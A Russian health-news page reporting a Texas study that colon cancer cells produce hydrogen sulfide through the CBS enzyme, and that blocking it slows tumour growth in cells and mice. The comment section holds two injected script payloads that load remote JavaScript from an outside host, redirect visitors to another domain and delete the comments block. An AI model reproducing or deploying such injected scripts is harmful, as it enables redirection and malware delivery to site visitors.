Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что общего у тухлых яиц и...  >>  Что общего у тухлых яиц и рака кишечника?
 
Обратная связь
 

Что общего у тухлых яиц и рака кишечника?

Размер шрифта
23 января 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые обнаружили, что зловонный запах сероводорода источают не только тухлые яйца, но и рак толстой кишки. Имеет ли данный факт практическое значение? Оказалось, что еще какое!

Что общего у тухлых яиц и рака кишечника?

Исследование, о котором мы говорим, проводилось в Техасском университете (США). Ученые выяснили, что клетки толстокишечного рака вырабатывают большое количество сероводорода. Более того: оказалось, что это дурно пахнущее соединение играет значительную роль в процессах роста и выживания опухоли!

«Раковые клетки любят сероводород и нуждаются в нем», – отмечает Чаба Сабо, профессор Техасского университета, ведущий автор исследования. «Полученные нами данные указывают на то, что клетки используют это вещество для производства энергии, размножении и проникновения в ткани организма».

Ученые считают, что в продукции сероводорода принимает участие особый белок под названием CBS, который присутствует в опухолевых клетках в значительно больших количествах, если сравнивать с нормой. Эксперименты показали, что химическая блокада CBS приводит к выраженному снижению опухолевого роста, в то время как клеточный рост здоровых тканей оставался неизмененным.

«Таким образом, мы сумели выявить новую потенциальную мишень для противоопухолевых препаратов», – утверждает Марк Хеллмих, один из профессоров исследовательской группы. «Блокируя CBS, мы можем эффективно бороться с раком».

Аналогичные результаты были получены на животной модели, в качестве которой выступили голые мыши. Животным предварительно имплантировали клетки рака толстой кишки. Оказалось, что без сероводорода опухоль демонстрировала сниженные темпы роста. Кроме того, отмечалось также уменьшение интенсивности ангиогенеза – процесса, в ходе которого образуются новые кровеносные сосуды. Этот феномен является абсолютно необходимым для выживания опухоли, потому что новообразованные сосуды поставляют раковым клеткам кислород и питательные вещества.

Открытие поразило американских ученых, однако они признают, что если проанализировать его чуть глубже, в нем легко обнаруживается логика и здравый смысл.

«Миллиарды лет назад на Земле не было кислорода, и сероводород был тем топливом, которое поддерживало существование жизни», – говорит Сабо. «Поэтому продукцию этого газа опухолевыми клетками можно рассматривать как воспроизведение древнего биохимического механизма».

Последний представляет клиницистам новые потенциальные возможности для терапии онкологических больных. «Мы с нетерпением ждем практического внедрения результатов нашего исследования».

Будем надеяться, что в конечном итоге эта работа станет тем фундаментом, на котором воздвигнется непреодолимая стена на пути канцерогенеза в толстой кишке.

Все о раке на страницах нашего специального проекта «Онко-дозор».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   На что слетаются мухи? Оказывается, на рак!   Стоит ли есть мясо? Хотите ли вы получить рак или нет?  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.